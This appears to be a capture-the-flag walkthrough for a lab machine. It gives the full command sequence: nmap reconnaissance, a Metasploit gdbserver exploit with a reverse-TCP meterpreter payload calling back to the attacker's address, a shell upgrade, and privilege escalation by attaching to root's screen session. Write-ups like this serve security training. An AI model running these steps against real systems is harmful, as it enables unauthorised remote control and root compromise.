Let's start with nmap:
nmap -sC -sV -p- targetIP
-sC runs the default scripts, -sV probes service versions, and -p- scans all 65535 ports.
We find port 1337 open.
Port 1337 is running gdbserver (the GNU debugger's remote debugging server).
There is a known exploit for this service, so let's load Metasploit:
msfconsole
search gdbserver
use exploit/multi/gdb/gdb_server_exec
show options
We need to set RHOSTS (remote host) to the IP of the target machine:
set RHOSTS 10.129.96.68
RPORT (remote port) should be set to 1337:
set RPORT 1337
We need to set LHOST (local host) to the IP of our machine. If you don't know the IP of your machine, type ifconfig.
set LHOST 10.10.14.21
We also need to set the payload. By default it is linux/x86/meterpreter/reverse_tcp;
we need to change it to linux/x64/meterpreter/reverse_tcp:
set payload linux/x64/meterpreter/reverse_tcp
We also need to change the target ID. By default it is target 0 for x86 (32-bit);
we need to change it to target 1 for x86_64 (64-bit):
set target 1
Now let's check again that we configured it properly:
show options
Let's run the exploit:
exploit
Once the Meterpreter session opens, drop to a system shell and upgrade it to an interactive TTY:
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
whoami
ls
cat user.txt
We got the user flag!
Let's try privilege escalation, starting with the usual check:
sudo -l
It asks for a password, which we don't have.
screen refuses to run without a terminal type, so set one:
export TERM=xterm
Now attach to root's existing screen session (-x attaches to a session that is still attached elsewhere):
/usr/bin/screen -x root/root
We are now root!
ls
cat root.txt
We got the root flag!
Congratulations!